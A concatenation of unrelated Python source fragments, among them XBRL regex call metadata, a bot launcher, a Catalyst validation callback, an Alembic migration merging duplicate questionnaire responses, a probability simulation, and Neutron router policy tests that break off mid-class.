'(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:interestanddebtexpense)', re.IGNORECASE | re.MULTILINE)\n", (15906, 15972), False, 'import re\n'), ((16211, 16342), 're.compile', 're.compile', (['"""(us-gaap:incomelossfromcontinuingoperationsbeforeincometaxesminorityinterest)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:incomelossfromcontinuingoperationsbeforeincometaxesminorityinterest)'\n , re.IGNORECASE | re.MULTILINE)\n", (16221, 16342), False, 'import re\n'), ((16674, 16769), 're.compile', 're.compile', (['"""(us-gaap:incomelossfromequitymethodinvestments)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:incomelossfromequitymethodinvestments)', re.IGNORECASE |\n re.MULTILINE)\n", (16684, 16769), False, 'import re\n'), ((17011, 17088), 're.compile', 're.compile', (['"""(us-gaap:incometaxexpensebenefit)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:incometaxexpensebenefit)', re.IGNORECASE | re.MULTILINE)\n", (17021, 17088), False, 'import re\n'), ((17329, 17501), 're.compile', 're.compile', (['"""(us-gaap:IncomeLossBeforeExtraordinaryItems AndCumulativeEffectOfChangeInAccountingPrinciple)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:IncomeLossBeforeExtraordinaryItems AndCumulativeEffectOfChangeInAccountingPrinciple)'\n , re.IGNORECASE | re.MULTILINE)\n", (17339, 17501), False, 'import re\n'), ((17744, 17831), 're.compile', 're.compile', (['"""(us-gaap:)[^s]*(discontinuedoperation)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s]*(discontinuedoperation)', re.IGNORECASE | re.\n MULTILINE)\n", (17754, 17831), False, 'import re\n'), ((18073, 18152), 're.compile', 're.compile', (['"""(us-gaap:extraordinaryitemnetoftax)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:extraordinaryitemnetoftax)', re.IGNORECASE | re.MULTILINE)\n", (18083, 18152), False, 'import re\n'), ((18377, 18448), 're.compile', 're.compile', (['"""(us-gaap:)[^s]*(incomeloss)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s]*(incomeloss)', re.IGNORECASE | re.MULTILINE)\n", (18387, 18448), False, 'import re\n'), ((18624, 18688), 're.compile', 're.compile', (['"""(us-gaap:profitloss)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:profitloss)', re.IGNORECASE | re.MULTILINE)\n", (18634, 18688), False, 'import re\n'), ((18901, 19034), 're.compile', 're.compile', (['"""(us-gaap:netincomeavailabletocommon stockholdersbasic)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:netincomeavailabletocommon stockholdersbasic)'\n , re.IGNORECASE | re.MULTILINE)\n", (18911, 19034), False, 'import re\n'), ((19254, 19386), 're.compile', 're.compile', (['"""(us-gaap:preferredstockdividendsand otheradjustments)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:preferredstockdividendsand otheradjustments)'\n , re.IGNORECASE | re.MULTILINE)\n", (19264, 19386), False, 'import re\n'), ((19589, 19728), 're.compile', 're.compile', (['"""(us-gaap:netincomelossattributableto noncontrollinginterest)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:netincomelossattributableto noncontrollinginterest)'\n , re.IGNORECASE | re.MULTILINE)\n", (19599, 19728), False, 'import re\n'), ((19952, 20019), 're.compile', 're.compile', (['"""^us-gaap:netincomeloss$"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('^us-gaap:netincomeloss$', re.IGNORECASE | re.MULTILINE)\n", (19962, 20019), False, 'import re\n'), ((20232, 20357), 're.compile', 're.compile', (['"""(us-gaap:othercomprehensiveincomeloss netoftax)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:othercomprehensiveincomeloss netoftax)',\n re.IGNORECASE | re.MULTILINE)\n", (20242, 20357), False, 'import re\n'), ((20553, 20626), 're.compile', 're.compile', (['"""(us-gaap:comprehensiveincome)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:comprehensiveincome)', re.IGNORECASE | re.MULTILINE)\n", (20563, 20626), False, 'import re\n'), ((20850, 20936), 're.compile', 're.compile', (['"""(us-gaap:comprehensiveincomenetoftax)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:comprehensiveincomenetoftax)', re.IGNORECASE | re.\n MULTILINE)\n", (20860, 20936), False, 'import re\n'), ((21174, 21327), 're.compile', 're.compile', (['"""(us-gaap:comprehensiveincomenetoftax attributabletononcontrollinginterest)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:comprehensiveincomenetoftax attributabletononcontrollinginterest)'\n , re.IGNORECASE | re.MULTILINE)\n", (21184, 21327), False, 'import re\n'), ((21591, 21723), 're.compile', 're.compile', (['"""(us-gaap:netcashprovidedbyusedin operatingactivities)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:netcashprovidedbyusedin operatingactivities)'\n , re.IGNORECASE | re.MULTILINE)\n", (21601, 21723), False, 'import re\n'), ((21918, 22050), 're.compile', 're.compile', (['"""(us-gaap:netcashprovidedbyusedin investingactivities)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:netcashprovidedbyusedin investingactivities)'\n , re.IGNORECASE | re.MULTILINE)\n", (21928, 22050), False, 'import re\n'), ((22245, 22377), 're.compile', 're.compile', (['"""(us-gaap:netcashprovidedbyusedin financingactivities)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:netcashprovidedbyusedin financingactivities)'\n , re.IGNORECASE | re.MULTILINE)\n", (22255, 22377), False, 'import re\n'), ((22583, 22735), 're.compile', 're.compile', (['"""(us-gaap:netcashprovidedbyusedin operatingactivitiescontinuingoperations)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:netcashprovidedbyusedin operatingactivitiescontinuingoperations)'\n , re.IGNORECASE | re.MULTILINE)\n", (22593, 22735), False, 'import re\n'), ((22983, 23135), 're.compile', 're.compile', (['"""(us-gaap:netcashprovidedbyusedin investingactivitiescontinuingoperations)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:netcashprovidedbyusedin investingactivitiescontinuingoperations)'\n , re.IGNORECASE | re.MULTILINE)\n", (22993, 23135), False, 'import re\n'), ((23389, 23541), 're.compile', 're.compile', (['"""(us-gaap:netcashprovidedbyusedin financingactivitiescontinuingoperations)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:netcashprovidedbyusedin financingactivitiescontinuingoperations)'\n , re.IGNORECASE | re.MULTILINE)\n", (23399, 23541), False, 'import re\n'), ((23797, 23948), 're.compile', 're.compile', (['"""(us-gaap:cashprovidedbyusedin operatingactivitiesdiscontinuedoperations)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:cashprovidedbyusedin operatingactivitiesdiscontinuedoperations)'\n , re.IGNORECASE | re.MULTILINE)\n", (23807, 23948), False, 'import re\n'), ((24208, 24359), 're.compile', 're.compile', (['"""(us-gaap:cashprovidedbyusedin investingactivitiesdiscontinuedoperations)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:cashprovidedbyusedin investingactivitiesdiscontinuedoperations)'\n , re.IGNORECASE | re.MULTILINE)\n", (24218, 24359), False, 'import re\n'), ((24609, 24744), 're.compile', 're.compile', (['"""(us-gaap:netcashprovidedbyusedin discontinuedoperations)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:netcashprovidedbyusedin discontinuedoperations)'\n , re.IGNORECASE | re.MULTILINE)\n", (24619, 24744), False, 'import re\n'), ((24972, 25084), 're.compile', 're.compile', (['"""(us-gaap:commonstockshares outstanding)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:commonstockshares outstanding)',\n re.IGNORECASE | re.MULTILINE)\n", (24982, 25084), False, 'import re\n'), ((25309, 25417), 're.compile', 're.compile', (['"""(us-gaap:commonstockshares issued)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:commonstockshares issued)', \n re.IGNORECASE | re.MULTILINE)\n", (25319, 25417), False, 'import re\n'), ((25635, 25746), 're.compile', 're.compile', (['"""(us-gaap:commonstockshares authorized)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:commonstockshares authorized)',\n re.IGNORECASE | re.MULTILINE)\n", (25645, 25746), False, 'import re\n'), ((26186, 26249), 're.compile', 're.compile', (['"""(dei:tradingsymbol)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(dei:tradingsymbol)', re.IGNORECASE | re.MULTILINE)\n", (26196, 26249), False, 'import re\n'), ((26569, 26639), 're.compile', 're.compile', (['"""(dei:entityregistrantname)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(dei:entityregistrantname)', re.IGNORECASE | re.MULTILINE)\n", (26579, 26639), False, 'import re\n'), ((26961, 27050), 're.compile', 're.compile', (['"""(dei:entitycommonstocksharesoutstanding)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(dei:entitycommonstocksharesoutstanding)', re.IGNORECASE | re.\n MULTILINE)\n", (26971, 27050), False, 'import re\n'), ((27373, 27440), 're.compile', 're.compile', (['"""(dei:entitypublicfloat)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(dei:entitypublicfloat)', re.IGNORECASE | re.MULTILINE)\n", (27383, 27440), False, 'import re\n'), ((30405, 30454), 're.findall', 're.findall', (['"""(?i)</([a-z0-9_\\\\.]+)>"""', 'xbrl_string'], {}), "('(?i)</([a-z0-9_\\\\.]+)>', xbrl_string)\n", (30415, 30454), False, 'import re\n'), ((5148, 5199), 're.compile', 're.compile', (['"""context"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('context', re.IGNORECASE | re.MULTILINE)\n", (5158, 5199), False, 'import re\n'), ((31281, 31309), 're.findall', 're.findall', (['"""(?i)<*>"""', 'token'], {}), "('(?i)<*>', token)\n", (31291, 31309), False, 'import re\n'), ((2320, 2347), 'datetime.timedelta', 'datetime.timedelta', ([], {'weeks': '(1)'}), '(weeks=1)\n', (2338, 2347), False, 'import datetime\n'), ((6403, 6424), 're.compile', 're.compile', (['"""[^\\\\d]+"""'], {}), "('[^\\\\d]+')\n", (6413, 6424), False, 'import re\n'), ((7029, 7050), 're.compile', 're.compile', (['"""[^\\\\d]+"""'], {}), "('[^\\\\d]+')\n", (7039, 7050), False, 'import re\n'), ((7700, 7721), 're.compile', 're.compile', (['"""[^\\\\d]+"""'], {}), "('[^\\\\d]+')\n", (7710, 7721), False, 'import re\n')]
|
import os
from bot.clientSetup import clientSetup
from bot.preferences import Preferences
def main():
os.chdir(os.path.dirname(__file__))
p = Preferences()
c = clientSetup(p)
f = open("data/token.txt", 'r')
token = f.readline()[:-1]
f.close()
c.run(token)
main()
|
[
"os.path.dirname",
"bot.clientSetup.clientSetup",
"bot.preferences.Preferences"
] |
[((154, 167), 'bot.preferences.Preferences', 'Preferences', ([], {}), '()\n', (165, 167), False, 'from bot.preferences import Preferences\n'), ((176, 190), 'bot.clientSetup.clientSetup', 'clientSetup', (['p'], {}), '(p)\n', (187, 190), False, 'from bot.clientSetup import clientSetup\n'), ((118, 143), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (133, 143), False, 'import os\n')]
|
from collections import defaultdict
from catalyst.core.callback import Callback, CallbackNode, CallbackOrder
from catalyst.core.runner import IRunner
class ValidationManagerCallback(Callback):
"""
A callback to aggregate runner.valid_metrics from runner.epoch_metrics.
"""
def __init__(self):
"""@TODO: Docs. Contribution is welcome."""
super().__init__(
order=CallbackOrder.Validation, node=CallbackNode.All,
)
def on_epoch_start(self, runner: IRunner) -> None:
"""Epoch start hook.
Args:
runner (IRunner): current runner
"""
runner.valid_metrics = defaultdict(None)
runner.is_best_valid = False
def on_epoch_end(self, runner: IRunner) -> None:
"""Epoch end hook.
Args:
runner (IRunner): current runner
"""
if runner.stage_name.startswith("infer"):
return
runner.valid_metrics = {
k.replace(f"{runner.valid_loader}_", ""): v
for k, v in runner.epoch_metrics.items()
if k.startswith(runner.valid_loader)
}
assert (
runner.main_metric in runner.valid_metrics
), f"{runner.main_metric} value is not available by the epoch end"
current_valid_metric = runner.valid_metrics[runner.main_metric]
if runner.minimize_metric:
best_valid_metric = runner.best_valid_metrics.get(
runner.main_metric, float("+inf")
)
is_best = current_valid_metric < best_valid_metric
else:
best_valid_metric = runner.best_valid_metrics.get(
runner.main_metric, float("-inf")
)
is_best = current_valid_metric > best_valid_metric
if is_best:
runner.is_best_valid = True
runner.best_valid_metrics = runner.valid_metrics.copy()
__all__ = ["ValidationManagerCallback"]
|
[
"collections.defaultdict"
] |
[((656, 673), 'collections.defaultdict', 'defaultdict', (['None'], {}), '(None)\n', (667, 673), False, 'from collections import defaultdict\n')]
|
from setuptools import setup, find_packages
setup(
name="home-assistant-frontend",
version="20191108.0",
description="The Home Assistant frontend",
url="https://github.com/home-assistant/home-assistant-polymer",
author="The Home Assistant Authors",
author_email="<EMAIL>",
license="Apache License 2.0",
packages=find_packages(include=["hass_frontend", "hass_frontend.*"]),
include_package_data=True,
zip_safe=False,
)
|
[
"setuptools.find_packages"
] |
[((345, 404), 'setuptools.find_packages', 'find_packages', ([], {'include': "['hass_frontend', 'hass_frontend.*']"}), "(include=['hass_frontend', 'hass_frontend.*'])\n", (358, 404), False, 'from setuptools import setup, find_packages\n')]
|
"""Remove duplicate QNR.identifiers
Revision ID: a1de3ab4d050
Revises: <KEY>
Create Date: 2019-02-11 16:48:55.332527
"""
import json
from sqlalchemy import func
from portal.database import db
from portal.dict_tools import dict_compare
from portal.models.audit import Audit
from portal.models.identifier import Identifier
from portal.models.questionnaire_response import QuestionnaireResponse
from portal.models.user import User
# revision identifiers, used by Alembic.
revision = 'a1de3ab4d050'
down_revision = '<KEY>'
def admin_id():
sys = User.query.filter_by(email='__system__').first()
return sys.id
def diff_docs(doc1, doc2):
"""Print details of two differing QNR documents"""
added, removed, modified, _ = dict_compare(doc1, doc2)
assert not added
assert not removed
assert not set(modified) - set(['authored', 'group'])
if modified:
if len(doc1['group']) != len(doc2['group']):
raise ValueError("diff group lens")
answers1 = doc1['group']
answers2 = doc2['group']
for a1, a2 in zip(answers1, answers2):
assert a1.keys() == a2.keys()
assert (a1['answer']['valueCoding']['code'] ==
a2['answer']['valueCoding']['code'])
if (a1['answer']['valueCoding']['extension']['valueDecimal'] !=
a2['answer']['valueCoding']['extension']['valueDecimal']):
print(" Question: {} valueDecimal: {} VERSUS {}".format(
a1['answer']['valueCoding']['code'],
a1['answer']['valueCoding']['extension']['valueDecimal'],
a2['answer']['valueCoding']['extension']['valueDecimal']))
def merge_duplicates(system, value):
msg = "merging questionnaire_responses with identifier ({}|{})".format(
system, value)
identifier = Identifier(system=system, value=value)
qnrs = QuestionnaireResponse.by_identifier(identifier)
print("found {} duplicates {}".format(len(qnrs), msg))
subject_ids = {q.subject_id for q in qnrs}
if len(subject_ids) != 1:
raise ValueError("ERROR, expect single subject {}".format(msg))
docs = [q.document for q in qnrs]
json_docs = {json.dumps(q.document) for q in qnrs}
if len(json_docs) != 1:
print("SKIP {} due to mismatching documents".format(
msg))
d1 = docs.pop()
while True:
d2 = docs.pop()
diff_docs(d1, d2)
d1 = d2
if not docs:
break
return # skipping out due to document mismatch
# Looks like perfect matches across the board - lets keep the first only
del_ids = [q.id for q in qnrs][1:]
audit = Audit(
user_id=admin_id(), subject_id=subject_ids.pop(),
_context='assessment',
comment="{} eliminating duplicate qnr.ids ({})".format(
msg, str(del_ids)))
db.session.add(audit)
QuestionnaireResponse.query.filter(
QuestionnaireResponse.id.in_(del_ids)).delete(
synchronize_session='fetch')
db.session.commit()
def upgrade():
# Only concerned about QuestionnaireResponses with more than
# one matching identifier
q = db.session.query(
QuestionnaireResponse.document['identifier']['system'],
QuestionnaireResponse.document['identifier']['value']).filter(
QuestionnaireResponse.document['identifier'].isnot(None)).group_by(
QuestionnaireResponse.document['identifier']['system'],
QuestionnaireResponse.document['identifier']['value']).having(
func.count(QuestionnaireResponse.document['identifier']) > 1)
# gather list of (system, value) tuples for subsequent attention.
# can't process inside query loop
needs_attention = [(system, value) for system, value in q]
for system, value in needs_attention:
merge_duplicates(system, value)
def downgrade():
# Don't restore that mess
pass
|
[
"portal.database.db.session.query",
"portal.models.questionnaire_response.QuestionnaireResponse.by_identifier",
"portal.models.questionnaire_response.QuestionnaireResponse.id.in_",
"portal.database.db.session.add",
"json.dumps",
"portal.database.db.session.commit",
"portal.models.user.User.query.filter_by",
"sqlalchemy.func.count",
"portal.models.identifier.Identifier",
"portal.dict_tools.dict_compare"
] |
[((735, 759), 'portal.dict_tools.dict_compare', 'dict_compare', (['doc1', 'doc2'], {}), '(doc1, doc2)\n', (747, 759), False, 'from portal.dict_tools import dict_compare\n'), ((1849, 1887), 'portal.models.identifier.Identifier', 'Identifier', ([], {'system': 'system', 'value': 'value'}), '(system=system, value=value)\n', (1859, 1887), False, 'from portal.models.identifier import Identifier\n'), ((1899, 1946), 'portal.models.questionnaire_response.QuestionnaireResponse.by_identifier', 'QuestionnaireResponse.by_identifier', (['identifier'], {}), '(identifier)\n', (1934, 1946), False, 'from portal.models.questionnaire_response import QuestionnaireResponse\n'), ((2908, 2929), 'portal.database.db.session.add', 'db.session.add', (['audit'], {}), '(audit)\n', (2922, 2929), False, 'from portal.database import db\n'), ((3067, 3086), 'portal.database.db.session.commit', 'db.session.commit', ([], {}), '()\n', (3084, 3086), False, 'from portal.database import db\n'), ((2213, 2235), 'json.dumps', 'json.dumps', (['q.document'], {}), '(q.document)\n', (2223, 2235), False, 'import json\n'), ((550, 590), 'portal.models.user.User.query.filter_by', 'User.query.filter_by', ([], {'email': '"""__system__"""'}), "(email='__system__')\n", (570, 590), False, 'from portal.models.user import User\n'), ((3579, 3635), 'sqlalchemy.func.count', 'func.count', (["QuestionnaireResponse.document['identifier']"], {}), "(QuestionnaireResponse.document['identifier'])\n", (3589, 3635), False, 'from sqlalchemy import func\n'), ((2979, 3016), 'portal.models.questionnaire_response.QuestionnaireResponse.id.in_', 'QuestionnaireResponse.id.in_', (['del_ids'], {}), '(del_ids)\n', (3007, 3016), False, 'from portal.models.questionnaire_response import QuestionnaireResponse\n'), ((3207, 3338), 'portal.database.db.session.query', 'db.session.query', (["QuestionnaireResponse.document['identifier']['system']", "QuestionnaireResponse.document['identifier']['value']"], {}), "(QuestionnaireResponse.document['identifier']['system'],\n QuestionnaireResponse.document['identifier']['value'])\n", (3223, 3338), False, 'from portal.database import db\n')]
|
import numpy as np
def realization(p_1, p_2, n_trials):
p_3 = 1.0 - p_1 - p_2
outcomes = np.random.random(n_trials)
ii_1 = outcomes<=p_1
ii_2 = (outcomes>p_1) & (outcomes<=(p_1+p_2))
ii_3 = (~ii_1) & (~ii_2)
outcomes[ii_1] = 1
outcomes[ii_2] = 2
outcomes[ii_3] = 3
N_1 = len(outcomes[outcomes==1])
N_2 = len(outcomes[outcomes==2])
return N_1, N_2
def joint_probability(p_1, p_2, n_trials, n_iteraciones):
proba = np.zeros([n_trials+1, n_trials+1])
for i in range(n_iteraciones):
N_1, N_2 = realization(p_1, p_2, n_trials)
proba[N_1, N_2] += 1
proba /= n_iteraciones
return proba
def covarianza(p_1, p_2, n_total):
p = joint_probability(p_1, p_2, n_total, 100000)
#valor esperado de N1*N2
E_N1_N2 = 0.0
for i in range(n_total+1):
for j in range(n_total+1):
E_N1_N2 += p[i,j] * i * j
# valor esperado de N1
E_N1 = 0.0
for i in range(n_total+1):
p_i = 0.0
for j in range(n_total+1):
p_i += p[i,j]
E_N1 += p_i * i
# valor esperado de N2
E_N2 = 0.0
for j in range(n_total+1):
p_j = 0.0
for i in range(n_total+1):
p_j += p[i,j]
E_N2 += p_j * j
return E_N1_N2 - E_N1 * E_N2
|
[
"numpy.random.random",
"numpy.zeros"
] |
[((99, 125), 'numpy.random.random', 'np.random.random', (['n_trials'], {}), '(n_trials)\n', (115, 125), True, 'import numpy as np\n'), ((468, 506), 'numpy.zeros', 'np.zeros', (['[n_trials + 1, n_trials + 1]'], {}), '([n_trials + 1, n_trials + 1])\n', (476, 506), True, 'import numpy as np\n')]
|
# Copyright (c) 2021 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_policy import policy as base_policy
from oslo_utils import uuidutils
from neutron import policy
from neutron.tests.unit.conf.policies import test_base as base
class RouterAPITestCase(base.PolicyBaseTestCase):
def setUp(self):
super(RouterAPITestCase, self).setUp()
self.target = {'project_id': self.project_id}
self.alt_target = {'project_id': self.alt_project_id}
class SystemAdminTests(RouterAPITestCase):
def setUp(self):
super(SystemAdminTests, self).setUp()
self.context = self.system_admin_ctx
def test_create_router(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router', self.alt_target)
def test_create_router_distributed(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router:distributed', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router:distributed', self.alt_target)
def test_create_router_ha(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router:ha', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router:ha', self.alt_target)
def test_create_router_external_gateway_info(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router:external_gateway_info',
self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router:external_gateway_info',
self.alt_target)
def test_create_router_external_gateway_info_network_id(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router:external_gateway_info:network_id',
self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router:external_gateway_info:network_id',
self.alt_target)
def test_create_router_external_gateway_info_enable_snat(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router:external_gateway_info:enable_snat',
self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router:external_gateway_info:enable_snat',
self.alt_target)
def test_create_router_external_gateway_info_external_fixed_ips(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context,
'create_router:external_gateway_info:external_fixed_ips',
self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context,
'create_router:external_gateway_info:external_fixed_ips',
self.alt_target)
def test_get_router(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'get_router', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'get_router', self.alt_target)
def test_get_router_distributed(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'get_router:distributed', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'get_router:distributed', self.alt_target)
def test_get_router_ha(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'get_router:ha', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'get_router:ha', self.alt_target)
def test_update_router(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router', self.alt_target)
def test_update_router_distributed(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router:distributed', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router:distributed', self.alt_target)
def test_update_router_ha(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router:ha', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router:ha', self.alt_target)
def test_update_router_external_gateway_info(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router:external_gateway_info',
self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router:external_gateway_info',
self.alt_target)
def test_update_router_external_gateway_info_network_id(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router:external_gateway_info:network_id',
self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router:external_gateway_info:network_id',
self.alt_target)
def test_update_router_external_gateway_info_enable_snat(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router:external_gateway_info:enable_snat',
self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router:external_gateway_info:enable_snat',
self.alt_target)
def test_update_router_external_gateway_info_external_fixed_ips(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context,
'update_router:external_gateway_info:external_fixed_ips',
self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context,
'update_router:external_gateway_info:external_fixed_ips',
self.alt_target)
def test_delete_router(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'delete_router', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'delete_router', self.alt_target)
def test_add_router_interface(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'add_router_interface', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'add_router_interface', self.alt_target)
def test_remove_router_interface(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'remove_router_interface', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'remove_router_interface', self.alt_target)
class SystemMemberTests(SystemAdminTests):
def setUp(self):
super(SystemMemberTests, self).setUp()
self.context = self.system_member_ctx
class SystemReaderTests(SystemMemberTests):
def setUp(self):
super(SystemReaderTests, self).setUp()
self.context = self.system_reader_ctx
class ProjectAdminTests(RouterAPITestCase):
def setUp(self):
super(ProjectAdminTests, self).setUp()
self.context = self.project_admin_ctx
def test_create_router(self):
self.assertTrue(
policy.enforce(self.context, 'create_router', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router', self.alt_target)
def test_create_router_distributed(self):
self.assertTrue(
policy.enforce(
self.context, 'create_router:distributed', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:distributed', self.alt_target)
def test_create_router_ha(self):
self.assertTrue(
policy.enforce(self.context, 'create_router:ha', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:ha', self.alt_target)
def test_create_router_external_gateway_info(self):
self.assertTrue(
policy.enforce(self.context,
'create_router:external_gateway_info',
self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:external_gateway_info',
self.alt_target)
def test_create_router_external_gateway_info_network_id(self):
self.assertTrue(
policy.enforce(self.context,
'create_router:external_gateway_info:network_id',
self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:external_gateway_info:network_id',
self.alt_target)
def test_create_router_external_gateway_info_enable_snat(self):
self.assertTrue(
policy.enforce(self.context,
'create_router:external_gateway_info:enable_snat',
self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:external_gateway_info:enable_snat',
self.alt_target)
def test_create_router_external_gateway_info_external_fixed_ips(self):
self.assertTrue(
policy.enforce(
self.context,
'create_router:external_gateway_info:external_fixed_ips',
self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context,
'create_router:external_gateway_info:external_fixed_ips',
self.alt_target)
def test_get_router(self):
self.assertTrue(
policy.enforce(self.context, 'get_router', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'get_router', self.alt_target)
def test_get_router_distributed(self):
self.assertTrue(
policy.enforce(
self.context, 'get_router:distributed', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'get_router:distributed', self.alt_target)
def test_get_router_ha(self):
self.assertTrue(
policy.enforce(self.context, 'get_router:ha', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'get_router:ha', self.alt_target)
def test_update_router(self):
self.assertTrue(
policy.enforce(self.context, 'update_router', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router', self.alt_target)
def test_update_router_distributed(self):
self.assertTrue(
policy.enforce(
self.context, 'update_router:distributed', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:distributed', self.alt_target)
def test_update_router_ha(self):
self.assertTrue(
policy.enforce(self.context, 'update_router:ha', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:ha', self.alt_target)
def test_update_router_external_gateway_info(self):
self.assertTrue(
policy.enforce(self.context,
'update_router:external_gateway_info',
self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:external_gateway_info',
self.alt_target)
